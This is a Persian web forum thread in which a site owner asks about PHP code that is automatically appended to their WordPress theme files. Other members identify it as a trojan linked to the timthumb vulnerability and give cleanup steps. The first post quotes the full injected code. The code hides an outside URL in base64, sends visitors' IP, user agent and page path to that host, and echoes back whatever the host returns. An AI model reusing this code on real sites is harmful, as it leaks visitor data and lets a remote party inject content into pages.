bmppc2

این کد چیه اضافه میشه؟

7 پست در این موضوع قرار دارد

سلام

تیتر مناسب برای سوال پیدا نکردم

من به تمامی قالبم این کد به صورت خودکار اضافه میشه:


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

چرا اینجوری میشه؟

0

به اشتراک گذاری این پست


لینک به پست

یک کد هست که مشخصات کاربر رو به سایت

http://browserglobalstat.com/statD/stat.php

ارسال میکنه

5

به اشتراک گذاری این پست


لینک به پست

سلام

نسخه وردپرس شما چنده؟

مشکل مشابه در وردپرس 3.2.1:


http://wordpress.org/support/topic/security-problem-8

راه حل توصیه شده:


http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

4

به اشتراک گذاری این پست


لینک به پست

ببخشید من این هارو دیدم اما نفهمیدم

میشه شما بگید چه کار کنم؟

0

به اشتراک گذاری این پست


لینک به پست

توی پوسته سایتتون timthumb استفاده شده؟

1

به اشتراک گذاری این پست


لینک به پست

این که میگید چی هست؟

0

به اشتراک گذاری این پست


لینک به پست

این ها کدهای یک بد افزار (تروجان) هستند که رمز FTP شما را سرقت میکنند و فایل های PHP, HTML و JS مورد حمله قرار خواهند گرفت.

  • افزونه هایی که شامل فایل timthumb.php و این کدها هستند غیر فعال و حذف شوند.
  • در آدرس wp-content/themes/YourTheme-name/ اگر فایل timthumb.php وجود داره حذف کنید.
  • حذف این کد از تمام فایل های پوستتون.
  • اسکن کردن سایت با ابزار آنلاین : http://sitecheck.sucuri.net/scanner
  • دانلود افزونه های استفاده شده و جایگزین کردن آنها.
  • جایگزین کردن فایل های اصلی وردپرس نسخه مورد استفاده شما و Reinstall کردن آن.
  • در نهایت تغییر رمز FTP سایتتون.

2

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری